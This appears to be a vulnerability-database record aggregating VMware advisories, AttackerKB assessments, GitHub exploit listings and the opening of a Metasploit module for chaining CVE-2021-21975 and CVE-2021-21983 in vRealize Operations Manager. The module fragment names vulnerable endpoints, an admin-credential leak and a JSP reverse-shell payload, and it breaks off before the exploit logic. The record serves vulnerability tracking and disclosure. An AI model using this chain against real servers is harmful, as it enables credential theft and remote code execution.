\n\n\n**Notes**\n\n[1] The hotfixes previously mentioned in this advisory were found to only have partially resolved CVE-2021-21975 leaving a residual risk of moderate severity (CVSS = 4.3). Hotfixes created to resolve the vulnerabilities documented in [VMSA-2021-0018](<https://www.vmware.com/security/advisories/VMSA-2021-0018.html>) also include complete fixes for CVE-2021-21975. \n \n[2] vRealize Operations Manager 8.4.0 shipped with the aforementioned incomplete fixes, and is therefore partially impacted by CVE-2021-21975.\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-03-30T00:00:00", "type": "vmware", "title": "VMware vRealize Operations updates address Server Side Request Forgery and Arbitrary File Write vulnerabilities (CVE-2021-21975, CVE-2021-21983)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 9.2, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2021-03-31T00:00:00", "id": "VMSA-2021-0004.1", "href": "https://www.vmware.com/security/advisories/VMSA-2021-0004.1.html", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}, {"lastseen": "2022-11-02T11:54:13", "description": 
"3a. Server Side Request Forgery in vRealize Operations Manager API (CVE-2021-21975) \n\nThe vRealize Operations Manager API contains a Server Side Request Forgery. VMware has evaluated this issue to be of 'Important' severity with a maximum CVSSv3 base score of 8.6. \n\n3b. Arbitrary file write vulnerability in vRealize Operations Manager API (CVE-2021-21983) \n\nThe vRealize Operations Manager API contains an arbitrary file write vulnerability. VMware has evaluated this issue to be of 'Important' severity with a maximum CVSSv3 base score of 7.2.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-03-30T00:00:00", "type": "vmware", "title": "VMware vRealize Operations updates address Server Side Request Forgery and Arbitrary File Write vulnerabilities (CVE-2021-21975, CVE-2021-21983)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2021-08-24T00:00:00", "id": "VMSA-2021-0004.2", "href": "https://www.vmware.com/security/advisories/VMSA-2021-0004.2.html", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}, {"lastseen": 
"2022-05-26T00:56:14", "description": "3\\. Advisory Details \n\nA URL on the administrative interface of the VMware Carbon Black Cloud Workload appliance can be manipulated to bypass authentication. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.1.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2021-04-01T00:00:00", "type": "vmware", "title": "VMware Carbon Black Cloud Workload appliance update addresses incorrect URL handling vulnerability (CVE-2021-21982)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21982"], "modified": "2021-04-01T00:00:00", "id": "VMSA-2021-0005", "href": "https://www.vmware.com/security/advisories/VMSA-2021-0005.html", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}], "attackerkb": [{"lastseen": "2022-10-30T15:47:25", "description": "Arbitrary file write vulnerability in vRealize Operations Manager API (CVE-2021-21983) prior to 8.4 may allow an authenticated malicious actor with network access to the vRealize Operations Manager API can write files to arbitrary locations 
on the underlying photon operating system.\n\n \n**Recent assessments:** \n \n**wvu-r7** at April 03, 2021 7:41am UTC reported:\n\nPlease see [CVE-2021-21975\u2019s Rapid7 analysis](<https://attackerkb.com/topics/51Vx3lNI7B/cve-2021-21975#rapid7-analysis>). CVE-2021-21975 can be chained with CVE-2021-21983 to achieve unauthed RCE.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-03-31T00:00:00", "type": "attackerkb", "title": "CVE-2021-21983", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2021-04-06T00:00:00", "id": "AKB:8B7D69F2-01FB-4346-8A49-EE255BAFFDA8", "href": "https://attackerkb.com/topics/uzsEZjT0Sc/cve-2021-21983", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}, {"lastseen": "2022-10-24T20:08:54", "description": "Server Side Request Forgery in vRealize Operations Manager API (CVE-2021-21975) prior to 8.4 may allow a malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack to 
steal administrative credentials.\n\n \n**Recent assessments:** \n \n**wvu-r7** at March 31, 2021 10:35pm UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/51Vx3lNI7B/cve-2021-21975#rapid7-analysis>) or [CVE-2021-21983\u2019s assessment](<https://attackerkb.com/assessments/fce71f33-eb17-490f-a80e-c4cd5059e0dc>).\n\n**Update:** According to GreyNoise, [attackers are scanning for CVE-2021-21975](<https://twitter.com/nathanqthai/status/1379888484865957891>).\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-03-31T00:00:00", "type": "attackerkb", "title": "CVE-2021-21975", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2021-06-05T00:00:00", "id": "AKB:DA3A63D5-4ECE-465D-8289-BD8119F15E95", "href": "https://attackerkb.com/topics/51Vx3lNI7B/cve-2021-21975", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}], "githubexploit": [{"lastseen": "2022-02-01T00:00:00", "description": "<b>[CVE-2021-21975] VMware vRealize Operations Manager 
API Serve...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-04-02T21:14:06", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Vmware Vrealize Operations Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21983", "CVE-2021-21975"], "modified": "2021-10-24T06:02:36", "id": "D5702470-2A4B-5116-9B9F-4001BDD6935C", "href": "", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "## Impacted Products\r\n\r\n- VMware vRealize Operations 8.3.0\u30018.2.0...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-03-31T15:40:09", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in 
Vmware Vrealize Operations Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21983", "CVE-2021-21975"], "modified": "2021-11-08T08:21:55", "id": "29AADC8A-DEC3-59E3-BF20-A227E39A5083", "href": "", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-19T19:57:08", "description": "# REALITY_SMASHER\nvRealize RCE + Privesc (CVE-2021-21975, CVE-20...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-04-06T23:24:38", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Vmware Vrealize Operations Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21983", "CVE-2021-21975"], "modified": "2022-02-19T17:06:47", "id": "911A7F63-1DBC-54A3-820C-F8F19E006338", "href": "", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-16T14:28:37", "description": "<b>[CVE-2021-21975] VMware vRealize Operations (vROps) Manager A...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-03-16T11:56:25", "type": "githubexploit", "title": "Exploit for Vulnerability in Vmware Vrealize Operations Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2022-03-16T13:53:28", "id": "33268543-6217-5EB6-9E15-3AD5A03E3B8E", "href": "", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-05-21T15:56:32", "description": "# VMWare-vRealize-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": 
"NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-03-31T12:56:09", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Vmware Vrealize Operations Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975"], "modified": "2022-05-21T13:18:48", "id": "1E8AE40F-314C-5935-B6FB-4F9B8A73A0E4", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# VMWare-CVE-2021-21975\n\n# VMWare-CVE-2021-21975 SSRF vulnerabil...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-04-10T12:36:07", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Vmware Vrealize Operations Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", 
"confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975"], "modified": "2021-12-03T00:24:52", "id": "7663BC50-C08E-5741-B771-BE50606E7B78", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-07-23T13:06:08", "description": "# CVE-2021-21975\n\n#SSRF-POC - ssrf to cred leak\n\n#First configur...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-03-31T13:33:45", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Vmware Vrealize Operations Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975"], "modified": "2022-07-23T07:58:27", "id": "35114B1B-006F-5732-8E42-9E8643B61C2A", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-07-30T20:26:21", "description": "# 
CVE-2021-21975\nNmap script to check vulnerability CVE-2021-219...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-04-01T21:59:05", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Vmware Vrealize Operations Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975"], "modified": "2022-07-30T17:32:47", "id": "7A372D54-3708-5032-B00A-2B54C2137FB7", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-03-25T19:01:57", "description": "## 0x01 \u6ce8\n\u8be5\u9879\u76ee\u4ec5\u4f9b\u5408\u6cd5\u7684\u6e17\u900f\u6d4b\u8bd5\u4ee5\u53ca\u7231\u597d\u8005\u53c2\u8003\u5b66\u4e60\uff0c\u8bf7\u5404\u4f4d\u9075\u5b88\u300a\u4e2d\u534e\u4eba\u6c11\u5171\u548c\u56fd\u7f51\u7edc\u5b89\u5168\u6cd5\u300b\u4ee5\u53ca\u76f8\u5e94\u5730\u65b9\u7684\u6cd5\u5f8b\uff0c\u7981\u6b62\u4f7f...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", 
"integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-01T01:14:20", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Vmware Vrealize Operations Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975", "CVE-2021-22005", "CVE-2021-26295"], "modified": "2022-03-25T11:15:15", "id": "4A8A9FBD-F634-579A-8E0A-49AA84D733A8", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "metasploit": [{"lastseen": "2022-11-02T03:03:48", "description": "This module exploits a pre-auth SSRF (CVE-2021-21975) and post-auth file write (CVE-2021-21983) in VMware vRealize Operations Manager to leak admin creds and write/execute a JSP payload. CVE-2021-21975 affects the /casa/nodes/thumbprints endpoint, and CVE-2021-21983 affects the /casa/private/config/slice/ha/certificate endpoint. Code execution occurs as the \"admin\" Unix user. The following vRealize Operations Manager versions are vulnerable: * 7.0.0 * 7.5.0 * 8.0.0, 8.0.1 * 8.1.0, 8.1.1 * 8.2.0 * 8.3.0 Version 8.3.0 is not exploitable for creds and is therefore not supported by this module. 
Tested successfully against 8.0.1, 8.1.0, 8.1.1, and 8.2.0.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-04-21T15:42:10", "type": "metasploit", "title": "VMware vRealize Operations (vROps) Manager SSRF RCE", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2021-05-06T23:30:20", "id": "MSF:EXPLOIT-LINUX-HTTP-VMWARE_VROPS_MGR_SSRF_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/linux/http/vmware_vrops_mgr_ssrf_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'VMware vRealize Operations (vROps) Manager SSRF RCE',\n 'Description' => %q{\n This module exploits a pre-auth SSRF (CVE-2021-21975) and post-auth\n file write 
(CVE-2021-21983) in VMware vRealize Operations Manager to\n leak admin creds and write/execute a JSP payload.\n\n CVE-2021-21975 affects the /casa/nodes/thumbprints endpoint, and\n CVE-2021-21983 affects the /casa/private/config/slice/ha/certificate\n endpoint. Code execution occurs as the \"admin\" Unix user.\n\n The following vRealize Operations Manager versions are vulnerable:\n\n * 7.0.0\n * 7.5.0\n * 8.0.0, 8.0.1\n * 8.1.0, 8.1.1\n * 8.2.0\n * 8.3.0\n\n Version 8.3.0 is not exploitable for creds and is therefore not\n supported by this module. Tested successfully against 8.0.1, 8.1.0,\n 8.1.1, and 8.2.0.\n },\n 'Author' => [\n 'Egor Dimitrenko', # Discovery\n 'wvu' # Analysis and exploit\n ],\n 'References' => [\n ['CVE', '2021-21975'], # SSRF\n ['CVE', '2021-21983'], # File write\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0004.html'],\n ['URL', 'https://twitter.com/ptswarm/status/1376961747232382976'],\n ['URL', 'https://attackerkb.com/topics/51Vx3lNI7B/cve-2021-21975#rapid7-analysis']\n ],\n 'DisclosureDate' => '2021-03-30', # Vendor advisory\n 'License' => MSF_LICENSE,\n 'Platform' => 'linux',\n 'Arch' => ARCH_JAVA,\n 'Privileged' => false,\n 'Targets' => [\n ['vRealize Operations Manager < 8.3.0', {}]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'SRVPORT' => 8443,\n 'SSL' => true,\n 'PAYLOAD' => 'java/jsp_shell_reverse_tcp'\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [\n IOC_IN_LOGS, # /usr/lib/vmware-casa/casa-webapp/logs\n ARTIFACTS_ON_DISK # /usr/lib/vmware-casa/casa-webapp/webapps/casa\n ]\n },\n 'Stance' => Stance::Aggressive\n )\n )\n\n register_options([\n Opt::RPORT(443),\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def setup\n super\n\n @creds = nil\n\n print_status('Starting SSRF server...')\n start_service\n end\n\n def check\n leak_admin_creds ? 
